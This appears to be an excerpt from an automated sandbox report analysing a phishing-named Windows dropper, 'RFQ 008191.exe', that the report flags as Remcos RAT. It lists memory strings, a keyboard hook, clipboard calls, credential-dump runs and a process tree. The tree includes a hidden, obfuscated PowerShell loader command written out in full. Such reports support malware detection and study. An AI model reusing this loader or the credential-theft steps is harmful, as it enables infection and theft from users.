              Source: Juryen.exe, 0000000D.00000002.1905221052.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: powershell.exe, 00000006.00000002.1762545128.0000000004BC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000006.00000002.1762545128.0000000004D16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
              Source: powershell.exe, 00000006.00000002.1766181326.0000000005C2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000006.00000002.1766181326.0000000005C2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000006.00000002.1766181326.0000000005C2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000006.00000002.1762545128.0000000004D16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: Juryen.exe, 0000000D.00000002.1905796304.0000000000644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: Juryen.exe, 0000000D.00000002.1905796304.0000000000644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: Juryen.exe, 0000000D.00000003.1904920514.0000000000979000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000D.00000002.1906158159.0000000000979000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000D.00000002.1905796304.0000000000644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: Juryen.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: powershell.exe, 00000006.00000002.1766181326.0000000005C2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: Juryen.exe, Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: Juryen.exeString found in binary or memory: https://www.google.com/accounts/servicelogin

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeWindows user hook set: 0 keyboard low level C:\Users\user~1\AppData\Local\Temp\Juryen.exeJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeCode function: 0_2_00405705 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405705
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_0040987A
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004098E2
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_00406DFC
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,14_2_00406E9F
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 15_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_004068B5
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 15_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_004072B5

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000B.00000002.2512739628.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Juryen.exe PID: 7864, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              System Summary

              barindex
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: RFQ 008191.exe
              Powershell drops PE file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Juryen.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_00401806 NtdllDefWindowProc_W,13_2_00401806
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_004018C0 NtdllDefWindowProc_W,13_2_004018C0
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_004016FD NtdllDefWindowProc_A,14_2_004016FD
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_004017B7 NtdllDefWindowProc_A,14_2_004017B7
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 15_2_00402CAC NtdllDefWindowProc_A,15_2_00402CAC
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 15_2_00402D66 NtdllDefWindowProc_A,15_2_00402D66
              Source: C:\Users\user\Desktop\RFQ 008191.exeCode function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040351C
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,11_2_0040351C
              Source: C:\Users\user\Desktop\RFQ 008191.exeCode function: 0_2_00406C5F0_2_00406C5F
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_00406C5F11_2_00406C5F
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_1F75B5C111_2_1F75B5C1
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_1F76719411_2_1F767194
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_0044B04013_2_0044B040
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_0043610D13_2_0043610D
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_0044731013_2_00447310
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_0044A49013_2_0044A490
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_0040755A13_2_0040755A
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_0043C56013_2_0043C560
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_0044B61013_2_0044B610
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_0044D6C013_2_0044D6C0
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_004476F013_2_004476F0
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_0044B87013_2_0044B870
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_0044081D13_2_0044081D
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_0041495713_2_00414957
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_004079EE13_2_004079EE
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_00407AEB13_2_00407AEB
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_0044AA8013_2_0044AA80
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_00412AA913_2_00412AA9
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_00404B7413_2_00404B74
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_00404B0313_2_00404B03
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_0044BBD813_2_0044BBD8
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_00404BE513_2_00404BE5
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_00404C7613_2_00404C76
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_00415CFE13_2_00415CFE
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_00416D7213_2_00416D72
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_00446D3013_2_00446D30
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_00446D8B13_2_00446D8B
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_00406E8F13_2_00406E8F
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_0040503814_2_00405038
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_0041208C14_2_0041208C
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_004050A914_2_004050A9
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_0040511A14_2_0040511A
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_0043C13A14_2_0043C13A
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_004051AB14_2_004051AB
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_0044930014_2_00449300
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_0040D32214_2_0040D322
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_0044A4F014_2_0044A4F0
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_0043A5AB14_2_0043A5AB
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_0041363114_2_00413631
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_0044669014_2_00446690
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_0044A73014_2_0044A730
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_004398D814_2_004398D8
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_004498E014_2_004498E0
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_0044A88614_2_0044A886
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_0043DA0914_2_0043DA09
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_00438D5E14_2_00438D5E
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_00449ED014_2_00449ED0
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_0041FE8314_2_0041FE83
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_00430F5414_2_00430F54
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 15_2_004050C215_2_004050C2
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 15_2_004014AB15_2_004014AB
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 15_2_0040513315_2_00405133
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 15_2_004051A415_2_004051A4
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 15_2_0040124615_2_00401246
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 15_2_0040CA4615_2_0040CA46
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 15_2_0040523515_2_00405235
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 15_2_004032C815_2_004032C8
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 15_2_004222D915_2_004222D9
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 15_2_0040168915_2_00401689
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 15_2_00402F6015_2_00402F60
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: String function: 00416760 appears 69 times
              Source: RFQ 008191.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@12/17@1/3
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,13_2_004182CE
              Source: C:\Users\user\Desktop\RFQ 008191.exeCode function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040351C
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,11_2_0040351C
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 15_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,15_2_00410DE1
              Source: C:\Users\user\Desktop\RFQ 008191.exeCode function: 0_2_004049B1 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004049B1
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,13_2_00413D4C
              Source: C:\Users\user\Desktop\RFQ 008191.exeCode function: 0_2_004021CF CoCreateInstance,0_2_004021CF
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 13_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,13_2_0040B58D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_03
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-HSAM04
              Source: C:\Users\user\Desktop\RFQ 008191.exeFile created: C:\Users\user~1\AppData\Local\Temp\nseB31A.tmpJump to behavior
              Source: RFQ 008191.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
              Source: C:\Users\user\Desktop\RFQ 008191.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Juryen.exe, Juryen.exe, 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: Juryen.exe, Juryen.exe, 0000000E.00000002.1879304771.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: Juryen.exe, 0000000B.00000002.2542497017.000000001F630000.00000040.10000000.00040000.00000000.sdmp, Juryen.exe, 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: Juryen.exe, Juryen.exe, 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: Juryen.exe, Juryen.exe, 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: Juryen.exe, Juryen.exe, 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: Juryen.exe, 0000000D.00000003.1904920514.0000000000979000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000D.00000002.1906158159.0000000000979000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Juryen.exe, Juryen.exe, 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: RFQ 008191.exeReversingLabs: Detection: 18%
              Source: C:\Users\user\Desktop\RFQ 008191.exeFile read: C:\Users\user\Desktop\RFQ 008191.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_14-33208
              Source: unknownProcess created: C:\Users\user\Desktop\RFQ 008191.exe "C:\Users\user\Desktop\RFQ 008191.exe"
              Source: C:\Users\user\Desktop\RFQ 008191.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Juryen.exe "C:\Users\user~1\AppData\Local\Temp\Juryen.exe"
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess created: C:\Users\user\AppData\Local\Temp\Juryen.exe C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\dcokdpgzihxxnj"
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess created: C:\Users\user\AppData\Local\Temp\Juryen.exe C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\owccehyavpqcxpshx"
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess created: C:\Users\user\AppData\Local\Temp\Juryen.exe C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\yyhnfajurxihaeglgsaa"
              Source: C:\Users\user\Desktop\RFQ 008191.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer)Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Juryen.exe "C:\Users\user~1\AppData\Local\Temp\Juryen.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess created: C:\Users\user\AppData\Local\Temp\Juryen.exe C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\dcokdpgzihxxnj"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess created: C:\Users\user\AppData\Local\Temp\Juryen.exe C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\owccehyavpqcxpshx"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeProcess created: C:\Users\user\AppData\Local\Temp\Juryen.exe C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\yyhnfajurxihaeglgsaa"Jump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ 008191.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
